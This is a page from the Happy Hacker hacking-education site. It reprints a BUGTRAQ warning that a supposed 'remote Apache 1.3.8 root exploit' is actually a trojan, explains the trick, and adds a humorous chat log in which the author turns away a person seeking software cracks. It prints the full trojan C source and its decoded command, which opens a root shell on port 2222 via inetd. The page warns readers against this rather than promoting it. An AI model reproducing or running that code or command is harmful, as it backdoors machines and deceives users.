What's New!

Chat with
Hackers

How to Defend
Your Computer 

The Guides
to (mostly) 
Harmless Hacking

Happy Hacker 
Digests (old stuff) 

Hacker Links 

Hacker
Wargames 

Meet the 
Happy Hacksters 

Help for 
Beginners 

Hacker 
Bookstore 

Humor 

It Sucks 
to Be Me!

How to Commit
Computer Crime (not)! 

What Is a 
Hacker, Anyhow? 

Have a 
Great Life! 

News from the 
Hacker War Front

Carolyn's most
popular book,
in 4th edition now!

For advanced
hacker studies,
read Carolyn's
Google Groups
Subscribe to Happy Hacker
Email:
Visit this group

***********************************************************************
*** Avoiding Trojan Horse Exploits
***********************************************************************

Below, I'm reprinting a posting from Marc Slemko (Apache Software Foundation
member) which appeared this past week on BUGTRAQ. I've withheld his email,
since I'm not sure if he'd want me to post it. Actually, I have been unable
to contact him, so I don't know if he minds my posting this, but I presume,
since he posted it to BUGTRAQ already, he would encourage the spread of this
info. Part of his point, presumably, is that there is no security hole in
apache, but more importantly, he warns of the dangers of using those "0day
exploits" that are found on some "hacker" websites. He writes:

>Below is some code that I have seen a number of times, with some
>very slight variations, over the past few months. I have no idea
>how many people have been tricked by it. This does not exploit
>any hole in Apache, period. As a simple inspection shows you, it
>will run:
>
>echo "2222 stream tcp nowait root /bin/sh sh -i">> /tmp/h;/usr/sbin/inetd
/tmp/h
>
>on the local machine. If you try this "exploit" as root, it will
>certainly try to compromise your machine. But not remotely and it
>is nothing to do with Apache or any bug other than the "bug" of
>admins running random code as root.
>
>I know this should be too obvious to have to say and should be no news to
>anyone here, but: do not run random supposed exploits as root on your box
>without knowing what they do. Do not even run them as a non-root UID
>unless it is a throwaway UID (better yet, a throw away box) and you have
>examined what the program does. This obviously applies to things posted
>to bugtraq but, even more so, to "secret" exploits you may find or be
>sent.
>
>Again: the below code has nothing to do with any supposed security hole
>in Apache.
>
>To top it all off, in this case is the fact is that there was never
>an Apache 1.3.8 released to exploit. Apache went from 1.3.6 to
>1.3.9.
>
>I am posting this to chop off any rumors of a "secret" Apache root exploit
>at the knees as well as to give people an example of why they shouldn't do
>silly things.
>
>Thanks.

He then posts the code. I'm posting it here, then I'll write a little about
how it works.

/* remote apache 1.3.8 root exploit (linux) */

#include <stdio.h>
#include <netdb.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

char shellcode[] = \
"\x65\x63\x68\x6f\x20\x22\x32\x32\x32\x32\x20\x73\x74\x72"
"\x65\x61\x6d\x20\x74\x63\x70\x20\x6e\x6f\x77\x61\x69\x74"
"\x20\x72\x6f\x6f\x74\x20\x2f\x62\x69\x6e\x2f\x73\x68\x20"
"\x73\x68\x20\x2d\x69\x22\x3e\x3e\x20\x2f\x74\x6d\x70\x2f"
"\x68\x3b\x2f\x75\x73\x72\x2f\x73\x62\x69\x6e\x2f\x69\x6e"
"\x65\x74\x64\x20\x2f\x74\x6d\x70\x2f\x68";

#define NOP 0x90
#define BSIZE 256
#define OFFSET 400
#define ADDR 0xbffff658
#define ASIZE 2000

int
main(int argc, char *argv[])
{
char *buffer;
int s;
struct hostent *hp;
struct sockaddr_in sin;
if (argc != 2) {
printf("%s <target>\n", argv[0]);
exit(1);
}
buffer = (char *) malloc(BSIZE + ASIZE + 100);
if (buffer == NULL) {
printf("Not enough memory\n");
exit(1);
}
memcpy(&buffer[BSIZE - strlen(shellcode)], shellcode,
strlen(shellcode));
buffer[BSIZE + ASIZE] = ';';
buffer[BSIZE + ASIZE + 1] = '\0';
hp = gethostbyname(argv[1]);
if (hp == NULL) {
printf("no such server\n");
exit(1);
}
bzero(&sin, sizeof(sin));
bcopy(hp->h_addr, (char *)&sin.sin_addr, hp->h_length);
sin.sin_family = AF_INET;
sin.sin_port = htons(80);
s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (s < 0) {
printf("Can't open socket\n");
exit(1);
}
if (connect(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
printf("Connection refused\n");
exit(1);
}
printf("sending exploit code...\n");
if (send(s, buffer, strlen(buffer), 0) != 1)
printf("exploit was successful!\n");
else
printf("sorry, this site isn't vulnerable\n");
printf("waiting for shell.....\n");
if (fork() == 0)
execl("/bin/sh", "sh", "-c", shellcode, 0);
else
wait(NULL);
while (1) { /* shell */ }
}

This code sure looks legit. It's got some reasonable headers, error messages
that look appropriate, and even a variable "shellcode" that seems to contain
some really evil hax0r exploit. Well... it does. The shellcode is not a
string sent to crash an apache server... far from it. Instead, it's just an
encoded (that's not encrypted... it's just hexed, so it's not readable) way
of providing the compiler with the text:

echo "2222 stream tcp nowait root /bin/sh sh -i">> /tmp/h;/usr/sbin/inetd
/tmp/h

Of course, this is not what you'd want run on your system. How do you avoid
such a thing? Well, first, you can run it on a throwaway machine. Also,
decode any and all such hex or octal strings you see in an exploit... see
what they contain when displayed in base 10. And never trust any site with
the phrase HPVAC on it :).

***********************************************************************
*** Quasi-Humorous Bonus
***********************************************************************

I know this isn't the time or the place, but I just have to stick this in as
a little "bonus". The following is a transcript of an AOL Instant Messenger
I had with someone who IM'ed me (probabaly using the "find a buddy by
interest" option: I list computers as a topic I'll chat about.) I've
obscured both names to protect the stupid (and to not give out my own
address). My comments are in <angle brackets>. This transcipt was made from
a conversation using TAC, the Tcl/TK clone of Instant Messenger.

<He initiates the conversation>
LowblFUBAR1: hey man are u computer literate
MikeFUBAR: I beg your pardon?
LowblFUBAR1: do u know alot about computers
MikeFUBAR: yes... do you know a lot about etiquette?
<Don't ever try and be rude to me, then ask for a favor. You want something,
be nice.>
LowblFUBAR1: sure
LowblFUBAR1: dont take it to heart bro
MikeFUBAR: I didn't
<I wish I had one of those :) things for "rolling my eyes">
LowblFUBAR1: do u know about cracks for netzero
MikeFUBAR: did you read the EULA?
<End User License Agreement-- that big bunch of text that everyone just
clicks "I Agree" and ignores. It says things like reverse engineering is
prohibited, no unauthorized duplication, and no disabling the ads>
LowblFUBAR1: naw
LowblFUBAR1: where can I?
MikeFUBAR: it tells you where you can get cracks
LowblFUBAR1: I am running win2k and none seem to work right
LowblFUBAR1: where can i read that
MikeFUBAR: do you know what it is? Or are you some 31337 l@m3r?
LowblFUBAR1: naw man
LowblFUBAR1: school me
MikeFUBAR: no can do, criminal-wannabe-dude... did you read my profile?
LowblFUBAR1: not even
LowblFUBAR1: don't go there
MikeFUBAR: you should, you might find the answer there
[My profile says: I'm currently working for the FBI computer crimes unit
part-time, and going to school full-time.]
LowblFUBAR1: yea right
LowblFUBAR1: quick typing
MikeFUBAR: You do know, BTW, that attempting to defeat the ads is a crime
LowblFUBAR1: who said i was going to use it i just said do u know where i
can find one for educational purposes
<I love that line>
MikeFUBAR: do you know anything at all about network programming? I.e., are
you aware of what 'netstat' does?
LowblFUBAR1: yes
MikeFUBAR: excellent
<I was hoping for more of a response, so I could tell him I had his IP
address. I know, AOL is server based, and the only connection that'll show
up is to the AOL server... but I don't think he would have known that>
LowblFUBAR1: hey man thanks for the little info that u gave me catch u
around some time and we can pick each others brain
<Does that mean he's going to be searching the web for EULA... hehe. And you
know what they say about picking your friends...>
MikeFUBAR: no problem, stay legal (or at least don't get caught :) )
LowblFUBAR1: thanks
LowblFUBAR1: later bro
<I sent this a few minutes later, since he should be able to read about
himself :)>
MikeFUBAR: BTW, I meant to ask you, do you know who CPM and/or JP are?
<I figured anyone who's ever read a so-called "hackers page" knows that the
names Meinel and Vranesevich are automatically taboo, but maybe he might not
even know enough to recongnize their initials :) >
LowblFUBAR1: NAW
<I was right>
MikeFUBAR: ok... never mind then
LowblFUBAR1: hey got any cool web site for me
MikeFUBAR: sorry man
LowblFUBAR1: why u ask
MikeFUBAR: just curious...
<And if he read HHUD, I would have told him to look for his name in the next
issue>
<about 30 minutes later>
LowblFUBAR1: hey bud
MikeFUBAR: yes?
LowblFUBAR1: have u heard of a compiler?
MikeFUBAR: I think I might've stumbled across that term once or twice in my
life....
LowblFUBAR1: hmmm......
LowblFUBAR1: interisting
<Hmm... seems like not only can he not spell, but sarcasm is _way_ over his
head>
MikeFUBAR: glad you think so
MikeFUBAR: was there a point to that last inquiry?
LowblFUBAR1: just a question
LowblFUBAR1: pickin at that brain again
<This guy has no life>
LowblFUBAR1: what about a c: file
LowblFUBAR1: cant figure that out
MikeFUBAR: <shrug> read your manual, it contains many useful tidbits of
information
<I'm assuming he means a .c source code file>
LowblFUBAR1: naw not that kind of c: file
LowblFUBAR1: nevermind u never head of it
<If I've said it once, I've said it a thousand times: flattery will get you
everywhere.>
MikeFUBAR: to what kind do you refer?
LowblFUBAR1: part of a compiler
MikeFUBAR: you mean a .c file?
LowblFUBAR1: there u go miss type my bad
<I think I know what a source code file is... yeah...>
MikeFUBAR: Like I said, RTFM, it'll teach you about .c, .cpp, .h, and all
the various files you need to compile your latest 0day evil haxor exploit...
it'll even make the flaming skulls appear on your screen....
LowblFUBAR1: ha ha
MikeFUBAR: that was not a joke
LowblFUBAR1: not even
LowblFUBAR1: i am seriouly learning for this class
<Not English class, I presume. I love people who have no ability to lie try
and become social engineers. Sheesh, these are the kind of people who
_should_ be dumpster diving.>
LowblFUBAR1: wont bother u anymore bro
LowblFUBAR1: later
MikeFUBAR: uh huh. Well... ask your teacher. Or RTFM... or both... or come
up with a _clever_ excuse.... adios
LowblFUBAR1: whateva man
<Thanks for the entertainment! Should anyone wish to know more about this
individual, his profile states: "Hello to all my sexy ladies out there. I
love to chat so if u want I m me and we canm[sic] talk about anything u
want. /Bye ladies/Blaze" I just hope none of you "sexy ladies" who want to
talk to this fine specimen plan to discuss computers with him...>

.... ._ .__. .__. _.__ .... ._ _._. _._ . ._. _.. .. __. . ... _

This is a list devoted to *legal* hacking! If anyone plans to use any
information in this Digest or at our Web site to commit crime, go away! We
like to put computer criminals behind bars where they belong!

 

 © 2013 Happy Hacker All rights reserved.